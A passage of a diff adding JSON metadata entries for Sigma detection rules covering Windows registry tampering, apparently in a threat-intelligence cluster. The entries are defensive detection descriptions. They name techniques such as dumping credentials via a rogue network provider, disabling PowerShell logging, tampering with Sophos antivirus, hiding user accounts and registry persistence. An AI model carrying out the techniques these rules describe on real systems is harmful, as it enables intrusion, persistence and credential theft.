"28036918-04d3-423d-91c0-55ecf99fb892", + "value": "NET NGenAssemblyUsageLog Registry Key Tamper" + }, + { + "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "This rule is to explore new applications on an endpoint. False positives depends on the organization.", + "Newly setup system.", + "Legitimate installation of new application." + ], + "filename": "registry_set_new_application_appcompat.yml", + "level": "informational", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/1", + "https://threathunterplaybook.com/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d", + "value": "New Application in AppCompat" + }, + { + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/23", + "falsepositive": [ + "Other legitimate network providers used and not filtred in this rule" + ], + "filename": "registry_set_new_network_provider.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "value": "New Network Provider - Registry" + }, + { + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/26", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_office_enable_dde.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/ADV170021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.002" + ] + }, + "uuid": "63647769-326d-4dde-a419-b925cc0caf42", + "value": "Enable Microsoft Dynamic Data Exchange" + }, + { + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "meta": { + "author": "Trent Liffick (@tliffick)", + "creation_date": "2020/05/22", + "falsepositive": [ + "Valid Macros and/or internal documents" + ], + "filename": "registry_set_office_security.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/inversecos/status/1494174785621819397", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", + "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "value": "Office Security Settings Changed" + }, + { + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/01/10", + "falsepositive": [ + "Legitimate Addin Installation" + ], + "filename": "registry_set_office_vsto_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_vivami/status/1347925307643355138", + "https://vanmieghem.io/stealth-outlook-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml" + ], + "tags": [ + "attack.t1137.006", + "attack.persistence" + ] + }, + "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "value": "Stealthy VSTO Persistence" + }, + { + "description": "Detects the modification of Outlook Security Setting to allow unprompted execution. Goes with win_outlook_c2_macro_creation.yml and is particularly interesting if both events occur near to each other.", + "meta": { + "author": "@ScoubiMtl", + "creation_date": "2021/04/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_outlook_c2_registry_key.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_c2_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ] + }, + "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "value": "Outlook C2 Registry Key" + }, + { + "description": "Detects the manipulation of persistent URLs which could execute malicious code", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_outlook_registry_todaypage.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "value": "Persistent Outlook Landing Today Pages" + }, + { + "description": "Detects the manipulation of persistent URLs which can be malicious", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_outlook_registry_webview.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "value": "Persistent Outlook Landing Pages" + }, + { + "description": "Change outlook email security settings", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "registry_set_outlook_security.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", + "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "value": "Change Outlook Security Setting in Registry" + }, + { + "description": "Detects potential persistence using Appx DebugPath", + "meta": { + "author": "frack113", + "creation_date": "2022/07/27", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_persistence_appx_debugger.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", + "https://github.com/rootm0s/WinPwnage", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "value": "Windows Registry Persistence DebugPath" + }, + { + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_persistence_autodial_dll.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", + "https://persistence-info.github.io/Data/autodialdll.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "value": "Persistence Via AutodialDLL" + }, + { + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Probable legitimate applications. If you find these please add them to an exclusion list" + ], + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "value": "COM Hijacking For Persistence With Suspicious Locations" + }, + { + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/09", + "falsepositive": [ + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + ], + "filename": "registry_set_persistence_mycomputer.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "value": "Persistence Via MyComputer Key and SubKeys" + }, + { + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", + "creation_date": "2020/04/14", + "falsepositive": [ + "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" + ], + "filename": "registry_set_persistence_search_order.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/", + "https://attack.mitre.org/techniques/T1546/015/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "value": "Windows Registry Persistence COM Search Order Hijacking" + }, + { + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_persistence_typed_paths.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", + "value": "Persistence Via TypedPaths" + }, + { + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_policies_associations_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "value": "Modify Attachment Manager Settings - Associations" + }, + { + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_policies_attachments_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "value": "Modify Attachment Manager Settings - Attachments" + }, + { + "description": "Detects that a powershell code is written to the registry as a service.", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_powershell_as_service.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "value": "PowerShell as a Service in Registry" + }, + { + "description": "Adds a RUN key that contains a powershell keyword", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate admin or third party scripts" + ], + "filename": "registry_set_powershell_in_run_keys.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "value": "Powershell in Windows Run Keys" + }, + { + "description": "Detects the modification of the registry of the currently logged in user to disable PowerShell module logging, script block logging or transcription and script execution logging", + "meta": { + "author": "frack113", + "creation_date": "2022/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_powershell_logging_disabled.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "value": "PowerShell Logging Disabled" + }, + { + "description": "Detects when a new custom protocole handler is registered", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/05/30", + "falsepositive": [ + "Legitimate applications registering a new custom protocol handler" + ], + "filename": "registry_set_register_custom_protocol_handler.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_register_custom_protocol_handler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", + "value": "Newly Registered Protocol Handler" + }, + { + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "8023f872-3f1d-4301-a384-801889917ab4", + "value": "Usage of Renamed Sysinternals Tools - RegistrySet" + }, + { + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use of the dll." + ], + "filename": "registry_set_scrobj_dll_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scrobj_dll_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "value": "Scrobj.dll COM Hijacking" + }, + { + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "meta": { + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "creation_date": "2022/05/04", + "falsepositive": [ + "Legitimate use of screen saver" + ], + "filename": "registry_set_scr_file_executed_by_rundll32.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/VakninHai/status/1517027824984547329", + "https://twitter.com/pabraeken/status/998627081360695297", + "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", + "value": "ScreenSaver Registry Key Set" + }, + { + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/04", + "falsepositive": [ + "Administrative scripts", + "Installation of a service" + ], + "filename": "registry_set_servicedll_hijack.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "612e47e9-8a59-43a6-b404-f48683f45bd6", + "value": "ServiceDll Hijack" + }, + { + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "meta": { + "author": "frack113", + "creation_date": "2022/03/18", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_set_nopolicies_user.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "value": "Registry Explorer Policy Modification" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_shim_databases_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.011" + ] + }, + "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", + "value": "Registry Key Creation or Modification for Shim DataBase" + }, + { + "description": "Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/26", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_silentprocessexit.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.012" + ] + }, + "uuid": "c81fe886-cac0-4913-a511-2822d72ff505", + "value": "SilentProcessExit Monitor Registration" + }, + { + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate SIP being registered by the OS or different software." + ], + "filename": "registry_set_sip_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/codesigning.html", + "https://github.com/gtworek/PSBits/tree/master/SIP", + "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1553.003" + ] + }, + "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "value": "Persistence Via New SIP Provider" + }, + { + "description": "Detects tamper attempts to sophos av functionality via registry key modification", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/02", + "falsepositive": [ + "Some FP may occure when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + ], + "filename": "registry_set_sophos_av_tamaper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", + "value": "Tamper With Sophos AV Registry Keys" + }, + { + "description": "Detects when an attacker set the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" to \"0\" in order to hide user account.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_special_accounts.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ] + }, + "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "value": "Hide User Account Via Special Accounts Reg Key" + }, + { + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_suppress_defender_notifications.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "value": "Activate Suppression of Windows Security Center Notifications" + }, + { + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", + "falsepositive": [ + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + ], + "filename": "registry_set_susp_app_paths_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.012" + ] + }, + "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "value": "Suspicious Values In App Paths Default Property" + }, + { + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/12", + "falsepositive": [ + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" + ], + "filename": "registry_set_susp_keyboard_layout_load.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", + "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "value": "Suspicious Keyboard Layout Load" + }, + { + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/01", + "falsepositive": [ + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + ], + "filename": "registry_set_susp_printer_driver.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1410545674773467140", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" + ] + }, + "uuid": "e0813366-0407-449a-9869-a2db1119dc41", + "value": "Suspicious Printer Driver Empty Manufacturer" + }, + { + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2018/07/18", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_susp_reg_persist_explorer_run.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "value": "Registry Persistence via Explorer Run Key" + }, + { + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "meta": { + "author": "Florian Roth, Markus Neis, Sander Wiebing", + "creation_date": "2018/08/25", + "falsepositive": [ + "Software using weird folders for updates" + ], + "filename": "registry_set_susp_run_key_img_folder.yml", + "level": "high", + 